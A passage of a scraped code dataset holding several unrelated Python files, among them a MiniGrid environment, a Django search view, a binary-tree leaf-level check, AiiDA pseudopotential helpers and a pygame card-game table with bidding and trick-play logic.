self[agent_pos].clear()\n self.agent.pos = agent_pos\n self.agent.state = self.rng.choice(self.agent.STATES)\n\n self.mission = 'get to a green goal square'\n\n def make_obj(self):\n type_ = self.rng.choice(self.objects)\n color = self.rng.choice(self.colors)\n\n if type_ in ['wall', 'goal', 'lava']:\n obj = entities.make(type_)\n elif type_ == 'door':\n state = self.rng.choice(entities.Door.STATES)\n obj = entities.make(type_, color=color, state=state)\n elif type_ == 'box':\n if self.rng.random() < .5:\n contains = None\n else:\n contains = self.make_obj()\n obj = entities.make(type_, color=color, contains=contains)\n else:\n obj = entities.make(type_, color=color)\n\n return obj\n\n\n# Register all environments with OpenAI gym\nfor name, obj in inspect.getmembers(sys.modules[__name__]):\n if inspect.isclass(obj) and obj.__module__ == __name__ and not name.startswith('_'):\n\n gym.envs.registration.register(\n id=f'MiniGrid-{name}-v1',\n entry_point=f'gym_minigrid.envs:{name}',\n reward_threshold=.95,\n )\n","sub_path":"gym_minigrid/envs.py","file_name":"envs.py","file_ext":"py","file_size_in_byte":61429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"468745519","text":"from datetime import date\n\nfrom django.views.generic.base import TemplateView\n\nfrom regulations.generator.api_reader import ApiReader\nfrom .utils import get_structure\n\nclient = ApiReader()\n\n\nclass SearchView(TemplateView):\n\n template_name = 'regulations/search.html'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n results = get_data(self.request.GET.get(\"q\"))\n today = date.today()\n parts = client.effective_parts(today)\n structure = get_structure(parts)\n c = {\n 'parts': parts,\n 'toc': structure,\n 'results': results,\n }\n return {**context, **c, **self.request.GET.dict()}\n\n\ndef get_data(query):\n return client.search(query)\n","sub_path":"regulations/views/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"534989027","text":"def duplicate(a_list):\n n = []\n for i in range(1, len(a_list)):\n k = i - 1\n count = 1\n while k >= 0 and count <= 2:\n if a_list[i] == a_list[k]:\n count += 1\n k -= 1\n if count >= 2:\n if a_list[i] not in n:\n n.append(a_list[i])\n return n\n\n\nprint(duplicate([1, 2, 3, 3, 5, 6, 7, 7, 7, 7]))\n","sub_path":"menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"261962789","text":"class BTnode:\n '''\n class to create an object of binary tree node\n '''\n\n def __init__(self, data):\n '''\n constructor to initialize fields\n such as data\n left pointer\n and right pointer\n '''\n self.data = data\n self.left = None\n self.right = None\n\n\ndef is_leaf(root):\n '''\n utility function to check\n if node is leaf node\n '''\n\n if root.left is None and root.right is None:\n return True\n\n return False\n\n\ndef same_level(root, level, store):\n '''\n Utility function to check\n if current root is a leaf node\n and store the level for it\n then call recursively for left and right\n store is a set that stores the level\n of leaf nodes found\n '''\n\n if root is None:\n return\n\n # check if leaf node\n # if a leaf node then it will not have\n # any child nodes\n if(is_leaf(root)):\n store.add(level)\n return\n\n # call for left and right\n same_level(root.left, level+1, store)\n same_level(root.right, level+1, store)\n\n return\n\n\ndef check(node):\n '''\n main function which calls other \n '''\n\n # initialze a set to store values\n store={}\n\n # call function same_level to fill values in store\n same_level(node,0,store)\n\n # if store has only one elemnt\n # implies that all the leaf nodes\n # are at same level\n if len(store) == 1:\n return True\n \n return False\n","sub_path":"leaf_same_level.py","file_name":"leaf_same_level.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"184353684","text":"# -*- coding: utf-8 -*-\nfrom aiida.orm.data.upf import UpfData, get_pseudos_from_structure\n\n\ndef get_pseudos_of_calc(calc):\n \"\"\"\n Return a dictionary of pseudos used by a given (pw.x, cp.x) calculation.\n\n This returns a dictionary ``pseudos`` that can be set in a builder as ``builder.pseudo = pseudos``.\n\n :param calc: a pw.x or cp.x calculation.\n :return: a dictionary where the key is the kind name and the value is the UpfData object.\n \"\"\"\n from aiida.common.links import LinkType\n\n pseudos = {}\n # I create here a dictionary that associates each kind name to a pseudo\n inputs = calc.get_inputs_dict(link_type=LinkType.INPUT)\n for linkname in inputs.keys():\n if linkname.startswith(calc._get_linkname_pseudo_prefix()):\n # Note that this string might be a sequence of kind names\n # concatenated by an underscore, see implementation in the\n # input plugin implementation.\n multiplekindstring = linkname[len(calc._get_linkname_pseudo_prefix()):]\n pseudos[multiplekindstring] = inputs[linkname]\n return pseudos\n\n\ndef validate_and_prepare_pseudos_inputs(structure, pseudos=None, pseudo_family=None):\n \"\"\"\n Use the explicitly passed pseudos dictionary or use the pseudo_family in combination with\n the structure to obtain that dictionary.\n\n The pseudos dictionary should now be a dictionary of UPF nodes with the kind as linkname\n As such, if there are multiple kinds with the same element, there will be duplicate UPF nodes\n but multiple links for the same input node are not allowed. Moreover, to couple the UPF nodes\n to the Calculation instance, we have to go through the use_pseudo method, which takes the kind\n name as an additional parameter. When creating a Calculation through a Process instance, one\n cannot call the use methods directly but rather should pass them as keyword arguments. However,\n we can pass the additional parameters by using them as the keys of a dictionary\n\n :param structure: StructureData node\n :param pseudos: a dictionary where keys are the kind names and value are UpfData nodes\n :param pseudo_family: string name of the pseudopotential family to use\n :raises: ValueError if neither pseudos or pseudo_family is specified or if no UpfData is found for\n every element in the structure\n :returns: a dictionary of UpfData nodes where the key is a tuple with the kind name\n \"\"\"\n from aiida.orm.data.base import Str\n result_pseudos = {}\n unique_pseudos = {}\n\n if pseudos and pseudo_family:\n raise ValueError('You cannot specify both \"pseudos\" and \"pseudo_family\"')\n elif pseudos is None and pseudo_family is None:\n raise ValueError('Neither an explicit pseudos dictionary nor a pseudo_family was specified')\n elif pseudo_family:\n # This will already raise some exceptions, potentially, like the ones below\n pseudos = get_pseudos_from_structure(structure, str(pseudo_family))\n\n if isinstance(pseudos, (str, unicode, Str)):\n raise TypeError('You passed \"pseudos\" as a string - maybe you wanted to pass it as \"pseudo_family\" instead?')\n\n for kind in structure.get_kind_names():\n if kind not in pseudos:\n raise ValueError('no pseudo available for element {}'.format(kind))\n elif not isinstance(pseudos[kind], UpfData):\n raise ValueError('pseudo for element {} is not of type UpfData'.format(kind))\n\n for kind, pseudo in pseudos.iteritems():\n unique_pseudos.setdefault(pseudo, []).append(kind)\n\n for pseudo, kinds in unique_pseudos.iteritems():\n result_pseudos[tuple(kinds)] = pseudo\n\n return result_pseudos\n","sub_path":"aiida_quantumespresso/utils/pseudopotential.py","file_name":"pseudopotential.py","file_ext":"py","file_size_in_byte":3702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"267836325","text":"import pygame\nimport cards\nimport view\nimport random\nimport copy\nimport time\nimport pprint\nfrom signalslot import Signal\nfrom ai_comp import ai\nfrom enum import Enum\n\nNUM_OF_PLAYERS = 4\nSTARTING_HAND = 13\nHIGHEST_CARD = 414\nLOWEST_CARD = 102\nVIEW_TRANSPARENT = False # Make the text box not transparent\n\n\nclass GameState(Enum):\n DEALING = 0\n POINT_CHECK = 1\n BIDDING = 2\n PLAYING = 3\n ENDING = 4\n\n\nclass PlayerRole(Enum):\n UNKNOWN = 0\n ATTACKER = 1\n DEFENDER = 2\n\n\nclass Table:\n \"\"\"\n A Table is the place where all actions takes place. It is essentially a FSM, doing different\n routines at each state. It needs to keep track of the score, roles, the rules, etc. It needs\n to ask each player for decisions and respond to them accordingly. The table will also need\n to inform any decision to the Main Screen so that it can update the screen to reflect that\n change through the use of callbacks (Signal and Slot). This call should be minimised by making\n all the changes before calling to update the screen in one go.\n\n FSM cycles\n ---\n Preloop - Prepare the cards once\n - Initiate Players and connect them to the Table\n 1. Shuffle and Deal out cards to Players.\n 2a. Detect weak hands and ask for reshuffle.\n 2b. Return to (1) if any reshuffle occurs, otherwise proceed.\n 3. Bidding round. Randomly pick a starting player, in clockwise manner\n ask for a bid until it is valid.\n 3b. Proceed only if 3 consecutive skips are detected.\n 3c. Ask the winner of the bid a card not in their hand.\n 3d. Set up the player roles, trump suit, rounds to win for both side\n 3e. Play the game. Start with bid winner if NO TRUMP, otherwise\n Starting next to the bid winner.\n 4a. With the first player, ask for any card, excluding trump suits if trump\n is not broken\n 4b. With subsequent players, ask for cards that follow the suit of the first player\n , include trump suit if trump is broken. Ask for any card if the player cannot\n follow suit.\n 4c. Once all 4 players has made valid plays, announce results, update scoring. Announce\n player roles if the partner card is played. Break trump if trump is played.\n 4d. Repeat 4 until 13 rounds are made. Maybe add early win if confirmed one side wins\n 5. Ask for a new game. Go back to 1 if true.\n\n All played cards go into a hidden discard pile.\n\n \"\"\"\n update_table = Signal()\n\n def __init__(self, x, y, width, height, clear_colour, autoplay=False, view_all_cards=False):\n # TODO: Reduce the amount of update_table call\n self.x = x\n self.y = y\n self.width = width\n self.height = height\n\n self.table_font = pygame.font.SysFont(\"None\", 25)\n self.player_font = pygame.font.SysFont(\"None\", 25)\n\n # For gameplay\n self.game_state = GameState.DEALING\n self.current_round = 0\n self.passes = 0\n self.current_player = 0\n self.first_player = False # This is for bidding purposes\n self.players = []\n self.players_playzone = []\n # Table status will be made known to the player by reference\n self.table_status = {'played cards': [0, 0, 0, 0], 'leading player': 0, 'trump suit': 1,\n 'trump broken': False, 'round history': [], 'bid': 0, 'partner': 0,\n 'partner reveal': False, 'defender': {'target': 0, 'wins': 0},\n 'attacker': {'target': 0, 'wins': 0}}\n\n # Prepare the surfaces for displaying\n self.background = pygame.Surface((self.width, self.height))\n self.background.fill(clear_colour)\n self.background = self.background.convert()\n\n # TODO: Update the drawing of the table?\n # Prepare the card with dimensions\n w_deck = min(self.height, self.width) * 0.18\n l_deck = min(self.width, self.height) * 0.7\n # This is not a deck as it will never be drawn\n self.discard_deck = cards.prepare_playing_cards(int(w_deck*0.7), int(w_deck*0.9))\n game_margins = 5\n\n # Players' deck positioning\n playerx = ((self.width - l_deck)//2,\n game_margins,\n (self.width - l_deck)//2,\n self.width - w_deck - game_margins)\n playery = (self.height - w_deck - game_margins,\n (self.height - l_deck)//2,\n game_margins,\n (self.height - l_deck)//2)\n h_spacing = 20\n v_spacing = 25\n\n # Middle playfield for announcer and player playing deck positioning\n playfield_margins = 5\n margins_with_w_deck = w_deck + playfield_margins + game_margins\n playfield_x = margins_with_w_deck\n playfield_y = margins_with_w_deck\n playfield_width = self.width - margins_with_w_deck * 2\n playfield_height = self.height - margins_with_w_deck * 2\n\n playdeckx = (playfield_x + (playfield_width - w_deck) / 2,\n playfield_x,\n playfield_x + (playfield_width - w_deck) / 2,\n playfield_x + playfield_width - w_deck)\n playdecky = (playfield_y + playfield_height - w_deck,\n playfield_y + (playfield_height - w_deck) / 2,\n playfield_y,\n playfield_y + (playfield_height - w_deck) / 2)\n\n # Player stats positioning\n stats_width = 100\n self.stats_height = 100\n stats_spacing = 10\n self.player_stats_x = (playdeckx[0] - stats_width - stats_spacing,\n playdeckx[1],\n playdeckx[2] + w_deck + stats_spacing,\n playdeckx[3])\n self.player_stats_y = (playdecky[0] + w_deck - self.stats_height,\n playdecky[1] - self.stats_height - stats_spacing,\n playdecky[2],\n playdecky[3] + w_deck + stats_spacing)\n\n self.player_stats = [[], [], [], []]\n\n # TODO: change surface to use colorkey, maybe, if the performance is tanked\n # Prepare all the player surfaces\n for i in range(4):\n vert = i % 2 == 1\n spacing = h_spacing\n if vert:\n spacing = v_spacing\n\n reveal_mode = cards.DeckReveal.HIDE_ALL\n if i == 0 or view_all_cards:\n reveal_mode = cards.DeckReveal.SHOW_ALL\n self.players.append(Player(playerx[i], playery[i],\n l_deck, w_deck,\n spacing, vert_orientation=vert,\n deck_reveal=reveal_mode))\n self.players[i].connect_to_table(self.table_status)\n if i > 0:\n self.players[i].add_ai(ai.RandomAI(self.table_status))\n\n self.players_playzone.append(cards.Deck(playdeckx[i], playdecky[i],\n w_deck, w_deck, 0))\n for j in range(3):\n surf = pygame.Surface((stats_width, self.stats_height / 3), pygame.SRCALPHA)\n rendered_text = self.player_font.render(\"Player {0:d}\".format(i), True,\n (255, 0, 255)).convert_alpha()\n self.center_text_on_surface(surf, rendered_text,\n (255, 255, 255, 255 * VIEW_TRANSPARENT))\n self.player_stats[i].append(surf)\n\n if autoplay:\n self.players[0].add_ai(ai.RandomAI(self.table_status))\n\n # Announcer positioning and surface creation\n announcer_margins = 5\n announcer_spacing = announcer_margins + w_deck\n self.announcer_x = playfield_x + announcer_spacing\n self.announcer_y = playfield_y + announcer_spacing\n self.announcer_width = playfield_width - 2 * announcer_spacing\n self.announcer_height = playfield_height - 2 * announcer_spacing\n self.announcer_line = []\n for i in range(3):\n surf = pygame.Surface((self.announcer_width, self.announcer_height/3), pygame.SRCALPHA)\n self.announcer_line.append(surf)\n\n self.update_all_players(role=True, wins=True)\n\n self.write_message(\"Press P to play!\")\n\n self.ongoing = False\n\n\n\n def center_text_on_surface(self, surf, rendered_text, clear_colour):\n line_center = surf.get_rect().center\n text_rect = rendered_text.get_rect(center=line_center)\n surf.fill(clear_colour)\n surf.blit(rendered_text, text_rect)\n\n def write_message(self, text, delay_time=0.5, line=0, update_now=True):\n \"\"\"\n Write a message into the center board surface (announcer)\n :param text: String to be displayed on the center board\n :param delay_time: How much delay to put once the string is display\n :param line: Which line of the announcer to write to\n :return: None\n \"\"\"\n if 0 <= line < len(self.announcer_line):\n print(text)\n text = text.strip('\\n')\n rendered_text = self.table_font.render(text, True, (255, 255, 255)).convert_alpha()\n self.center_text_on_surface(self.announcer_line[line], rendered_text,\n (255, 255, 255, 255*VIEW_TRANSPARENT))\n if update_now:\n self.update_table.emit()\n time.sleep(delay_time)\n\n def update_players_role(self, player_num, update_now=True):\n self.player_stats[player_num][1].fill((255, 255, 255, 255*VIEW_TRANSPARENT))\n if self.players[player_num].role == PlayerRole.DEFENDER:\n rendered_text = self.player_font.render(\"Defender\", True, (0, 64, 192)).convert_alpha()\n self.center_text_on_surface(self.player_stats[player_num][1], rendered_text,\n (255, 255, 255, 255 * VIEW_TRANSPARENT))\n elif self.players[player_num].role == PlayerRole.ATTACKER:\n rendered_text = self.player_font.render(\"Attacker\", True, (192, 0, 0)).convert_alpha()\n self.center_text_on_surface(self.player_stats[player_num][1], rendered_text,\n (255, 255, 255, 255 * VIEW_TRANSPARENT))\n if update_now:\n self.update_table.emit()\n\n def update_player_wins(self, player_num, update_now=True):\n self.player_stats[player_num][2].fill((255, 255, 255, 255*VIEW_TRANSPARENT))\n if self.players[player_num].score > 1:\n rendered_text = self.player_font.render(\"Wins: {0:d}\".format(self.players[player_num].score), True,\n (255, 255, 255)).convert_alpha()\n else:\n rendered_text = self.player_font.render(\"Win: {0:d}\".format(self.players[player_num].score), True,\n (255, 255, 255)).convert_alpha()\n self.center_text_on_surface(self.player_stats[player_num][2], rendered_text,\n (255, 255, 255, 255 * VIEW_TRANSPARENT))\n if update_now:\n self.update_table.emit()\n\n def update_all_players(self, role=False, wins=True):\n for i in range(4):\n if wins:\n self.update_player_wins(i, update_now=False)\n if role:\n self.update_players_role(i, update_now=False)\n self.update_table.emit()\n\n def display_current_player(self, current=-1):\n if current >= 0:\n print(\"Player {0:d}\\n\".format(current))\n for i in range(4):\n rendered_text = self.player_font.render(\"Player {0:d}\".format(i), True,\n (255, 0, 255)).convert_alpha()\n if i == current:\n self.center_text_on_surface(self.player_stats[i][0], rendered_text,\n (0, 64, 0, 255))\n else:\n self.center_text_on_surface(self.player_stats[i][0], rendered_text,\n (255, 255, 255, 255 * VIEW_TRANSPARENT))\n\n self.update_table.emit()\n\n def update_team_scores(self):\n if self.table_status['partner reveal']:\n msg = \"Defender: {0:d}/{2:d}, Attacker: {1:d}/{3:d}\\n\".format(self.table_status['defender']['wins'],\n self.table_status['attacker']['wins'],\n self.table_status['defender']['target'],\n self.table_status['attacker']['target'])\n self.write_message(msg, line=2)\n else:\n msg = \"Defender: {0:d}?/{1:d}, Attacker: ?/{2:d}\\n\".format(self.table_status['defender']['wins'],\n self.table_status['defender']['target'],\n self.table_status['attacker']['target'])\n self.write_message(msg, line=2)\n\n def get_pos(self):\n return self.x, self.y\n\n def continue_game(self):\n \"\"\"\n This is where the FSM is. State transition should occur here.\n What takes place in the state should be in a function.\n :return: None\n \"\"\"\n # TODO: Adjust the timing of sleep\n if self.game_state == GameState.DEALING:\n self.shuffle_and_deal()\n self.write_message(\"Shuffle Complete!\")\n self.game_state = GameState.POINT_CHECK\n\n elif self.game_state == GameState.POINT_CHECK:\n if self.check_reshuffle():\n self.write_message('Reshuffle Initiated!', line=1)\n self.game_state = GameState.ENDING\n else:\n self.write_message('No Reshuffle needed!')\n self.game_state = GameState.BIDDING\n self.write_message(\"Start to Bid\")\n self.prepare_bidding()\n elif self.game_state == GameState.BIDDING:\n bid_complete = self.start_bidding()\n if bid_complete:\n self.game_state = GameState.PLAYING\n self.update_all_players(role=True, wins=True)\n self.update_team_scores()\n\n elif self.game_state == GameState.PLAYING:\n self.play_a_round()\n if self.current_round == 13:\n self.write_message(\"Game Set! Press P to play again!\")\n self.ongoing = False\n self.game_state = GameState.ENDING\n else:\n self.reset_game()\n self.game_state = GameState.DEALING\n\n def shuffle_and_deal(self):\n \"\"\"\n Shuffle and deal the discard deck to the players, which should have 52 cards.\n :return: None\n \"\"\"\n if self.discard_deck:\n for i in range(10):\n random.shuffle(self.discard_deck)\n for player in self.players:\n for i in range(STARTING_HAND):\n player.add_card(self.discard_deck.pop())\n self.update_table.emit()\n\n def check_reshuffle(self):\n \"\"\"\n Detect any possible reshuffle request within the players\n :return: True if reshuffle requested, else False\n \"\"\"\n print(\"Player Point Count\")\n for i, player in enumerate(self.players):\n print(\"Player {0:d}: {1:d}\".format(i, player.get_card_points()))\n if player.get_card_points() < 4:\n self.write_message(\"Low points detected in Player {0:d}! \".format(i))\n return player.make_decision(self.game_state, 0)\n\n def prepare_bidding(self):\n # Randomly pick a starting player, whom also is the current bid winner\n self.current_player = random.randint(1, NUM_OF_PLAYERS) - 1\n print(\"Starting Player: {0:d}\".format(self.current_player))\n self.passes = 0\n self.table_status[\"bid\"] = 11 # Lowest Bid: 1 Club by default\n self.first_player = True # Starting bidder \"privilege\" to raise the starting bid\n msg = \"Current Bid: {0:d} {1:s}\".format(self.table_status[\"bid\"] // 10,\n cards.get_suit_string(self.table_status[\"bid\"] % 10))\n self.write_message(msg, line=1, delay_time=0)\n self.display_current_player(self.current_player)\n msg = 'Bid Leader: Player {0:d}'.format((self.current_player - self.passes - 1 * (not self.first_player)) % 4)\n self.write_message(msg, line=2, delay_time=1)\n\n def start_bidding(self):\n \"\"\"\n The bidding procedure.\n :return: Whether bidding is completed\n \"\"\"\n # Highest bid: 7 NoTrump. No further check required\n if self.passes < NUM_OF_PLAYERS - 1 and self.table_status[\"bid\"] < 75:\n player_bid = self.players[self.current_player].make_decision(self.game_state, 0)\n if not player_bid:\n if not self.first_player: # Starting bidder pass do not count at the start\n self.passes += 1\n else:\n self.table_status[\"bid\"] = player_bid\n self.passes = 0\n\n if self.table_status[\"bid\"] < 75:\n self.current_player += 1\n self.current_player %= 4\n msg = \"Current Bid: {0:d} {1:s}\".format(self.table_status[\"bid\"] // 10,\n cards.get_suit_string(self.table_status[\"bid\"] % 10))\n self.write_message(msg, line=1, update_now=False)\n msg = 'Bid Leader: Player {0:d}'.format((self.current_player - self.passes\n - 1 * (not self.first_player)) % 4)\n self.write_message(msg, line=2, update_now=False)\n self.display_current_player(self.current_player)\n if self.first_player:\n self.first_player = False\n time.sleep(0.5)\n return False\n else:\n self.write_message(\"Player {0:d} is the bid winner!\".format(self.current_player), delay_time=1)\n msg = \"Player {0:d} is calling a partner...\".format(self.current_player)\n self.write_message(msg, delay_time=1)\n self.display_current_player(self.current_player)\n # Ask for the partner card\n self.table_status[\"partner\"] = self.players[self.current_player].make_decision(self.game_state, 1)\n\n # Setup the table status before the play starts\n self.table_status['partner reveal'] = False\n self.table_status[\"trump suit\"] = self.table_status[\"bid\"] % 10\n self.table_status[\"trump broken\"] = False\n self.table_status['played cards'] = [0, 0, 0, 0]\n if self.table_status['trump suit'] == 5:\n self.table_status[\"leading player\"] = self.current_player\n else:\n self.table_status[\"leading player\"] = (self.current_player + 1) % 4\n self.table_status['defender']['target'] = self.table_status[\"bid\"] // 10 + 6\n self.table_status['attacker']['target'] = 14 - self.table_status['defender']['target']\n\n # Set the roles of the players\n self.players[self.current_player].role = PlayerRole.DEFENDER\n\n self.write_message('Bidding Complete', delay_time=0)\n msg = 'Trump: {1:s}, Partner: {0:s}'.format(cards.get_card_string(self.table_status[\"partner\"]),\n cards.get_suit_string(self.table_status['trump suit']))\n self.write_message(msg, line=1, delay_time=1)\n return True\n\n def play_a_round(self):\n \"\"\"\n Ask each player to play a valid card and determine the winner of the round\n :return: None\n \"\"\"\n if not any(self.table_status[\"played cards\"]):\n # Leading player starts with the leading card, which determines the leading suit\n self.current_player = self.table_status['leading player']\n self.display_current_player(self.current_player)\n card = self.players[self.current_player].make_decision(self.game_state, 0)\n self.table_status[\"played cards\"][self.current_player] = card\n self.players_playzone[self.current_player].add_card(card)\n elif not all(self.table_status[\"played cards\"]):\n # Subsequent player make their plays, following suit if possible\n self.display_current_player(self.current_player)\n print(\"Player {0:d}\\n\".format(self.current_player))\n card = self.players[self.current_player].make_decision(self.game_state, 1)\n self.players_playzone[self.current_player].add_card(card)\n self.table_status[\"played cards\"][self.current_player] = card\n else:\n # Once all player played, find out who wins\n leading_card = self.table_status[\"played cards\"][self.table_status['leading player']]\n card_suits = [card.suit() for card in self.table_status[\"played cards\"]]\n card_nums = [card.number() for card in self.table_status[\"played cards\"]]\n follow_suits = [suit == leading_card.suit() for suit in card_suits]\n trumps = [suit == self.table_status['trump suit'] for suit in card_suits]\n trump_played = any(trumps)\n\n # Break trump if the trump suit is played\n if not self.table_status['trump broken']:\n if trump_played:\n self.table_status['trump broken'] = True\n self.write_message(\"Trump Broken!\", delay_time=1)\n\n # Determine which players to check for winner, and determine winner\n valid_nums = [card_nums[i] * ((follow_suits[i] and not trump_played) or trumps[i]) for i in range(4)]\n winning_player = valid_nums.index(max(valid_nums))\n self.write_message(\"Player {0:d} wins!\\n\".format(winning_player), delay_time=1)\n self.players[winning_player].score += 1\n self.update_player_wins(winning_player)\n\n # Clean up the cards, update score, set the next leading player, update round history\n for deck in self.players_playzone:\n self.discard_deck.append(deck.remove_card())\n\n if self.players[winning_player].role == PlayerRole.DEFENDER:\n self.table_status['defender']['wins'] += 1\n elif self.players[winning_player].role == PlayerRole.ATTACKER:\n self.table_status['attacker']['wins'] += 1\n\n self.table_status['leading player'] = winning_player\n self.table_status['round history'].append(copy.copy(self.table_status[\"played cards\"]))\n self.update_team_scores()\n self.table_status[\"played cards\"] = [0]*4\n self.current_round += 1\n self.update_table.emit()\n return\n\n if not self.table_status['partner reveal']:\n if card.value == self.table_status['partner']:\n self.table_status['partner reveal'] = True\n self.write_message(\"Partner Revealed!\", delay_time=1)\n self.reveal_all_roles(self.current_player)\n self.update_all_players(role=True, wins=False)\n\n self.current_player += 1\n self.current_player %= 4\n self.update_table.emit()\n time.sleep(0.5)\n\n def reveal_all_roles(self, partner):\n self.players[partner].role = PlayerRole.DEFENDER\n self.table_status['defender']['wins'] += self.players[partner].score\n for i in range(4):\n if self.players[i].role == PlayerRole.UNKNOWN:\n self.players[i].role = PlayerRole.ATTACKER\n self.table_status['attacker']['wins'] += self.players[i].score\n\n def reset_game(self):\n for player in self.players:\n while not player.is_empty():\n self.discard_deck.append(player.remove_card())\n player.score = 0\n player.role = PlayerRole.UNKNOWN\n\n for i in range(4):\n self.update_players_role(i)\n self.update_player_wins(i)\n self.table_status['defender']['wins'] = 0\n self.table_status['attacker']['wins'] = 0\n self.table_status[\"played cards\"] = [0]*4\n self.table_status['round history'] = []\n self.current_round = 0\n self.write_message(\"\", line=1, update_now=False)\n self.write_message(\"\", line=2)\n self.display_current_player()\n print(len(self.discard_deck))\n self.update_table.emit()\n\n\nclass Player(cards.Deck):\n \"\"\"\n A player is essentially a Deck with decision making function or AI component if it is a bot\n that returns a valid action for the Table/Board.\n\n The player has the knowledge of Table status in the form of a dictionary (as it is mutable, thus passed by ref)\n so all validation is done by the player\n\n Possible decisions, each decision has to be enum maybe:\n - Query the board status (i.e. current round, player status), AI most likely need a lot more\n - Query the last round\n - Attempt to play a card\n - Play the validate move\n\n The player also implements method to play from the terminal\n if it is not a bot.\n\n \"\"\"\n def __init__(self, *args, ai_component=None, **kwargs):\n super().__init__(*args, **kwargs)\n\n self.role = PlayerRole.UNKNOWN\n self.AI = ai_component\n self._table_status = None # This is found in Table and updated through Table\n self.score = 0\n\n def connect_to_table(self, table):\n self._table_status = table\n\n def add_ai(self, ai_comp):\n self.AI = ai_comp\n ai_comp.connect_to_player(self)\n\n def make_decision(self, game_state, sub_state):\n \"\"\"\n The player will need to make a decision depending on the game state and sub-state\n :param game_state: Current game state\n :param sub_state: Sub-state which affects the output for the current game state\n :return: For Bidding: Either a bid or a partner call, int\n For Playing: A Card\n For Reshuffle: bool, True to reshuffle, False otherwise\n \"\"\"\n if game_state == GameState.POINT_CHECK:\n if self.AI:\n return self.AI.request_reshuffle()\n if input(\"Reshuffle? (y/n)\").lower() == 'y':\n return self.request_reshuffle()\n if game_state == GameState.BIDDING:\n if sub_state == 0:\n if self.AI:\n return self.AI.make_a_bid()\n return self.make_a_bid()\n else:\n if self.AI:\n return self.AI.call_partner()\n return self.call_partner()\n if game_state == GameState.PLAYING:\n if self.AI:\n play = self.AI.make_a_play(sub_state)\n [_, pos] = self.check_card_in(play)\n return self.remove_card(pos)\n return self.make_a_play(sub_state)\n\n def make_a_bid(self):\n \"\"\"\n The procedure to make a bid\n :return: A valid bid number\n \"\"\"\n while True:\n bid = input(\"Please input a bid in the format 'number' + 'suit' \\n\"\n \"To pass, enter nothing. \\n\"\n \"e.g 4d is 4 Diamond, 6n is 6 No Trump \\n\")\n\n if not bid:\n return 0\n\n bid = cards.convert_bid_string(bid)\n if bid < 0:\n print(\"Error in processing bid\")\n continue\n\n if self._table_status[\"bid\"] < bid:\n return bid\n else:\n if bid > 75:\n print(\"You cannot bid beyond 7 No Trump\")\n else:\n print(\"You might need to bid higher\")\n\n def call_partner(self):\n \"\"\"\n The procedure to call a partner\n :return: A valid card value\n \"\"\"\n current_card_values = self.get_deck_values()\n while True:\n partner = input(\"Please call your partner card. Enter card number + suit number \\n\"\n \"e.g. qs is Queen Spade, 8c is 8 Clubs, ah is Ace Hearts\\n\")\n\n partner = cards.convert_input_string(partner)\n if partner in current_card_values:\n print(\"Please call a card outside of your hand\")\n elif cards.card_check(partner):\n return partner\n else:\n print(\"Invalid card call\")\n\n def make_a_play(self, substate):\n \"\"\"\n The procedure to make a play in a round\n :return: A valid Card\n \"\"\"\n while True:\n play = input(\"Please play a card.Enter card number + suit number \\n\"\n \"e.g. qs is Queen Spade, 8c is 8 Clubs, ah is Ace Hearts\\n\")\n if play == \"v\":\n pprint.pprint(self._table_status)\n else:\n play = cards.convert_input_string(play)\n if play > 0:\n if substate == 0:\n valid = self.check_for_valid_plays(play, True)\n else:\n valid = self.check_for_valid_plays(play, False)\n\n if valid:\n [_, pos] = self.check_card_in(play)\n return self.remove_card(pos)\n\n print(\"Invalid play\")\n\n def view_last_round(self):\n pass\n\n def check_for_valid_plays(self, card, leading):\n \"\"\"\n Check if the card played is valid\n :param card: int\n :param leading: bool\n :return:\n \"\"\"\n if not self.check_card_in(card):\n return False\n card_suit = cards.get_card_suit(card)\n if leading:\n if not self._table_status['trump broken'] and \\\n card_suit == self._table_status['trump suit']:\n if any([not cards.get_card_suit(crd) == self._table_status['trump suit'] for crd in self.get_deck_values()]):\n return False\n else:\n leading_card_suit = self._table_status['played cards'][self._table_status[\"leading player\"]].suit()\n if not card_suit == leading_card_suit and \\\n any([cards.get_card_suit(crd) == leading_card_suit for crd in\n self.get_deck_values()]):\n return False\n\n return True\n\n def get_card_points(self):\n suit_points = 0\n card_points = []\n current_suit = 1\n card_position = 0\n for (i, card) in enumerate(self.cards):\n if card.suit() != current_suit:\n suit_points += (i-card_position) // 5\n card_position = i\n current_suit = card.suit()\n card_points.append(max(0, card.number() - 10))\n suit_points += (STARTING_HAND-card_position) // 5\n return suit_points + sum(card_points)\n\n def request_reshuffle(self):\n # Players can choose NOT to reshuffle\n # But always reshuffle for simplicity\n return True\n\n\nclass MainPlayer(cards.PlayerDeck):\n def __init__(self, *args, ai_component=None, **kwargs):\n super().__init__(*args, **kwargs)\n\n self.AI = ai_component\n self.table_status = None # This is found in Table and updated through Table\n\n def connect_to_table(self, table):\n self.table_status = table\n\n def make_a_bid(self):\n pass\n\n def make_a_play(self):\n pass\n\n def view_last_round(self):\n pass\n\n def check_for_valid_moves(self):\n pass\n\n\nclass TestView(view.PygView):\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.table = Table(0, 0, self.width, self.height, (0, 0, 255))\n self.table.update_table.connect(self.draw_table)\n self.draw_table()\n\n def draw_table(self, **kwargs):\n self.screen.blit(self.background, (0, 0))\n self.screen.blit(self.table.background, self.table.get_pos())\n for player in self.table.players:\n self.screen.blit(player.deck_surface, player.get_pos())\n for playerzone in self.table.players_playzone:\n self.screen.blit(playerzone.deck_surface, playerzone.get_pos())\n pygame.display.flip()\n\n def run(self):\n running = True\n while running:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n running = False\n if event.key == pygame.K_p:\n print('add cards')\n pass\n\n # milliseconds = 